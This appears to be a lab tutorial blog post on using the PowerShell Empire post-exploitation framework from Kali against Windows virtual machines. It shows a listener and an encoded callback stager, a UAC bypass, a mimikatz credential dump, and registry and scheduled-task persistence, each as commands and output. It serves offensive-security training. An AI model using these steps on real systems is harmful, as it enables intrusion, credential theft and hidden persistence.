How to hack with Powershell is a common question. PowerShell is powerful and therefore dangerous in the world of security. On top of that it’s everywhere, meaning it’s already installed on Windows machines by default. Imagine now tools that allow the ethical hacker to run PowerShell without being detected, in memory. One of those tools, and one with a great support community powering it, is Empire. This post covers how to use the post-exploitation framework Empire with Kali Linux.
Table of Contents
Here’s What You Need
Hosts
Don’t have a 2016 Domain Controller virtual machine yet? See the easy guide for setting up the 2016 Server.
- Windows 7 Virtual Machine
- Kali Linux Virtual Machine
- Windows 2016 Server Virtual Machine
- DNS, AD DS, DHCP Roles Enabled
Networking
Using VirtualBox, the network adapter we are using exclusively is the internal network, intnet. What’s happening is the 2016 server is acting as DHCP server, while the other virtual hosts are acting as DHCP clients. This way they receive ip addresses in this little virtual subnet 10.0.0.1/24.
Getting Started
root@kali:~# git clone https://github.com/EmpireProject/Empire
Now run the bash script to install the package.
root@kali:~/Empire# sudo ./setup/install.sh
Empire has an option to use the Docker file instead of a regular setup. This can done by using the docker pull command.
root@kali:~/Empire# ls
changelog Dockerfile lib plugins setup
data empire LICENSE README.md VERSION
Notice that “empire” is bright green-yellow, anyway, it means it is an exe. Let’s run it as root.
root@kali:~/Empire# sudo ./empire
Looking through the output of the “help” command, you can see there are many available commands.
(Empire) > list
(Empire) > listeners
[!] No listeners currently active
(Empire: listeners) >
A look at the documentation found in the wiki’s Quickstart, gives away some instructions for setting up Empire.
Listeners
There is an option to use HTTPS for listeners. I want to take advantage of that so I run the install script, cert.sh. The script creates a PEM formatted certificate locally in /data/ as well as the certificate’s private key in a PEM formatted .key file.
root@kali:~/Empire# sudo ./setup/cert.sh
[*] Certificate written to ../data/empire-chain.pem
[*] Private key written to ../data/empire-priv.key
We need to configure a listener as the first step of using Empire.
(Empire) > uselistener http
(Empire) > info
There is a lot of similarity between Empire and Metasploit. The commands are almost identical in cases. For example, the listener options can be set using the set command at this stage.
# list the active listeners
(Empire) > listeners
[!] No listeners currently active
# set the listener type to use
(Empire: listeners) > uselistener http
# start the listener
(Empire: listeners/http) > execute
# now try listing the active listeners
(Empire) > listeners
Now that our setup has an active listener configured the next concept is Stagers.
Going to the new hosted URL <kali IP address> in another virtual machine leads to a fake Windows IS server. Requests to the URL are logged by Empire and displayed in the terminal.
# request to the listener URL logged
(Empire: listeners) > [!] favicon.ico requested by 10.0.1.7 with no routing packet.
Stagers
There is one setting that is Required: Yes but has no default value. In other words we have to set one!
(Empire) > usestager multi/launcher
(Empire: stager/multi/launcher) > info
Name: Launcher
Description:
Generates a one-liner stage0 launcher for Empire.
Listener True Listener to generate stager for.
Set Listener.
(Empire: stager/multi/launcher) > set Listener http
Now run the stager.
(Empire: stager/multi/launcher) > execute
powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAHIAcwBJAG8ATgBUAEEAQgBsAEUALgBQAFMAVgBFAHIAUwBpAE8ATgAuAE0AQQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABHAFAARgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUATQBiAEwAWQAuAEAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAU...==
(Empire: stager/multi/launcher) > [*] Sending POWERSHELL stager (stage 1) to 10.0.1.9
[*] New agent FK9LE3C5 checked in
[+] Initial agent FK9LE3C5 from 10.0.1.9 now active (Slack)
[*] Sending agent (stage 2) to FK9LE3C5 at 10.0.1.9
Agents
(Empire: stager/multi/launcher) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen
---- -- ----------- ------------ -------- ------- --- ----- ---------
FK9LE3C5 ps 10.0.1.9 SKIPPY-PC skippy-PC\skippy powershell 2260 5/0.0 2019-04-04 20:05:19
Rename the agent for ease of use.
(Empire: agents) > rename FK9LE3C5 Agent1
(Empire: agents) > interact Agent1
Try to run mimikatz.
(Empire: Agent1) > mimikatz
[!] Error: module needs to run in an elevated context.
Type usemodule <tab>.
(Empire: AgentElevated) > usemodule
Display all 204 possibilities? (y or n)
code_execution/invoke_dllinjection
credentials/mimikatz/golden_ticket
privesc/bypassuac
For this we can use a module that is similar to a Metasploit counterpart, bypassuac. In other words an exploit to bypass Windows User Access Control. For Empire this means it will return a new agent, with an elevated user privilege.
(Empire: agents) > interact AgentElevated
(Empire: AgentElevated) > mimikatz
[*] Tasked KZBVPDRA to run TASK_CMD_JOB
[*] Agent KZBVPDRA tasked with task ID 1
[*] Tasked agent AgentElevated to run module powershell/credentials/mimikatz/logonpasswords
Mimikatz run’s it’s sekurlsa::logonpasswords script and dumps the password in cleartext. It also shows the LM, NTLM, and SHA1 hashes for the user’s password.
.#####. mimikatz 2.1.1 (x86) built on Nov 12 2017 15:43:57
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # sekurlsa::logonpasswords
Session : Interactive from 1
User Name : skippy
Domain : skippy-PC
Logon Server : SKIPPY-PC
Logon Time : 4/4/2019 7:02:30 PM
msv :
[00000003] Primary
* Username : skippy
* Domain : skippy-PC
* LM : e52cac67419a9a224a3b108f3fa6cb6d
* NTLM : 8846f7eaee8fb117ad06bdd830b7586c
* SHA1 : e8f97fba9104d1ea5047948e6dfb67facd9f5b73
tspkg :
* Username : skippy
* Domain : skippy-PC
* Password : password
Persistence
(Empire: AgentElevated) > usemodule persistence/userland/registry
# show requirements
(Empire: powershell/persistence/userland/registry) > info
Name: Invoke-Registry
Module: powershell/persistence/userland/registry
NeedsAdmin: False
OpsecSafe: False
Language: powershell
MinLanguageVersion: 2
Background: False
OutputExtension: None
# once again need to set Listener!
Listener True Listener to use.
Set the Listener to http type and execute the module to establish persistence via the registry. A key is added to \HKCU:CurrentVersion\Debug.
(Empire: powershell/persistence/userland/registry) > set Listener http
(Empire: powershell/persistence/userland/registry) > execute
Registry persistence established using listener http stored in HKCU:Software\Microsoft\Windows\CurrentVersion\Debug.
Switching gears here, let’s use a different module to establish persistence. This module involves using the Windows schtasks service. The exploit will actually create a scheduled task that is visible in Windows.
(Empire: AgentElevated) > usemodule persistence/elevated/schtasks*
(Empire: powershell/persistence/elevated/schtasks) > info
(Empire: powershell/persistence/userland/registry) > set Listener http
(Empire: powershell/persistence/elevated/schtasks) > set OnLogon True
SUCCESS: The scheduled task "Updater" has successfully been created.
Schtasks persistence established using listener http stored in HKLM:\Software\Microsoft\Network\debug with Updater OnLogon trigger.
(Empire: powershell/persistence/elevated/schtasks) > execute
Looking at the Windows host Task Scheduler.
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKLM:\Software\Microsoft\Network debug).debug)))"
Now after a new logon event.
(Empire: powershell/persistence/elevated/schtasks) > [*] Sending POWERSHELL stager (stage 1) to 10.0.1.9
[*] Sending POWERSHELL stager (stage 1) to 10.0.1.9
[*] New agent 58SPLWZ9 checked in
[+] Initial agent 58SPLWZ9 from 10.0.1.9 now active (Slack)
[*] Sending agent (stage 2) to 58SPLWZ9 at 10.0.1.9
[*] New agent G5T9HXBR checked in
[+] Initial agent G5T9HXBR from 10.0.1.9 now active (Slack)
[*] Sending agent (stage 2) to G5T9HXBR at 10.0.1.9
Updated For PowerShell Empire 3.0
BC-Security now maintains a fork of the original, its new project is PowerShell Empire 3.0. See the newer post for the PowerShell Empire 3.0 tutorial.